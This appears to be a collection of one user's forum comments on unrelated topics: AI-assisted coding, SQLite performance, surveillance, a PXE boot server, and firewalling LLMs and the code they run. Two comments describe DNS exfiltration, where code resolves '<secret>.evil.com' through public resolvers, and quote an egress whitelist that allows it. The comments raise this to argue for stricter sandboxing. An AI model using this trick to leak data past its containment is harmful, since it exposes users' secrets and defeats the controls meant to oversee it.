- Historically, tinkerers had to stay within an extremely limited scope of what they know well enough to enjoy working on.
AI changes that. If someone wants to code in a new area, it's 10000000x easier to get started.
What if the # of handwritten lines of code is actually increasing with AI usage?
- The website claims it’s 10x cheaper (“10x faster on same hardware costs”) and implements SQL execution.
I don’t understand why GPU saturation is relevant. If it’s 10x cheaper, it doesn’t matter if you only use 0.1% of the GPU, right?
Correctness shouldn’t be a concern if it implements SQL.
Curious for some more details, maybe there’s something I’m missing.
- Did you try WITHOUT ROWID? Your sqlite implementation[1] uses a BLOB primary key. In SQLite, this means each operation requires 2 b-tree traversals: The BLOB->rowid tree and the rowid->data tree.
If you use WITHOUT ROWID, you traverse only the BLOB->data tree.
Looking up lexicographically similar keys gets a huge performance boost since sqlite can scan a B-Tree node and the data is contiguous. Your current implementation is chasing pointers to random locations in a different b-tree.
I'm not sure exactly whether on disk size would get smaller or larger. It probably depends on the key size and value size compared to the 64 bit rowids. This is probably a well studied question you could find the answer to.
[1]: https://git.deuxfleurs.fr/Deuxfleurs/garage/src/commit/4efc8...
- > During his time as the Executive Director of the American Peanut Shellers, John helped to found the Peanut Institute and the U.S. Peanut Federation. These two entities have helped to promote the interests of the peanut industry throughout the United States and the world. Moreover, John has worked on eight farm bills during his life, always advocating for those who he represented. Since 2001, John, in association with the National Peanut Board, has helped to steer more than 36 million dollars to food allergy research, outreach and education. Earlier this year, because of his significant contributions to the Peanut Industry, John was inducted into the American Peanut Council Hall of Fame.
- Not just the LLM, but any code that the LLM outputs also has to be firewalled.
Sandboxing your LLM but then executing whatever it wants in your web browser defeats the point. CORS does not help.
Also, the firewall has to block most DNS traffic, otherwise the model could query `A <secret>.evil.com` and Google/Cloudflare servers (along with everybody else) will forward the query to evil.com. Secure DNS, therefore, also can't be allowed.
katakate[1] is still incomplete, but something that it is the solution here. Run the LLM and its code in firewalled VMs.
- Isn’t there precedent for many other governments secretly or openly doing exactly this? Snowden etc?
There’s an arms race element to this that I don’t see people discussing.
Do EU citizens have any privacy from US tech? Is there anything to protect?
Do we want the USA to have exclusive right to spy on the world?
Is it better to have 1 Big Brother or 10?
- 2014 interview with the creator: https://spacing.ca/toronto/2014/08/13/meet-bertie-brain-worl...
- > One thing I could do is make it exposed in config, to allow the user to block all DNS resolutions until Cilium is integrated. LMK if desired!
Yes, but it's not great for it to be an optional config option. Trivially easy to use data exfiltration methods shouldn't be possible at all in a tool like this, let alone enabled by default.
I want to recommend ppl to try this out and not have to tell them about the 5 different options they need to configure in order for it to actually be safe. It ends up defeating the purpose of the tool in my opinion.
Some use cases will require mitmproxy whitelists as well, eg default deny pulling container image except matching the container whitelist.
This is basically a wide-open network policy as far as data exfiltration goes, right?name: project-build image: alpine:latest namespace: default egress_whitelist: - "1.1.1.1/32" # Cloudflare DNS - "8.8.8.8/32" # Google DNSMalicious code just has to resolve <secret>.evil.com and Google/CF will forward that query to evil resolver.
- It’s not a DHCP server the way you’re thinking. Pxehost only replies with a couple fields for PXE boot, and only to clients that are declaring themselves as PXE boot client. It doesn’t interfere with the normal dhcp server - the PXE client will get 2 broadcast replies, one from pxehost and one from the dhcp server, and will combine the info
- I vibe coded the site for pxehost - https://pxehost.com
The text content is largely hand written but the style/structures/etc are vibes.
Codex CLI on the $20 plus plan
The first shot was remarkably similar to the end result, but there was lots of tweaking and testing.
The website https://pxehost.com - via codex CLI
The actual project itself (a pxe server written in go that works on macOS) - https://github.com/pxehost/pxehost - ChatGPT put the working v1 of this in 1 message.
There was much tweaking, testing, refactoring (often manually) before releasing it.
Where AI helps is the fact that it’s possible to try 10-20 different such prototypes per day.
The end result is 1) Much more handwritten code gets produced because when I get a working prototype I usually want to go over every detail personally; 2) I can write code across much more diverse technologies; 3) The code is better, because each of its components are the best of many attempts, since attempts are so cheap.
I can give more if you like, but hope that is what you are looking for.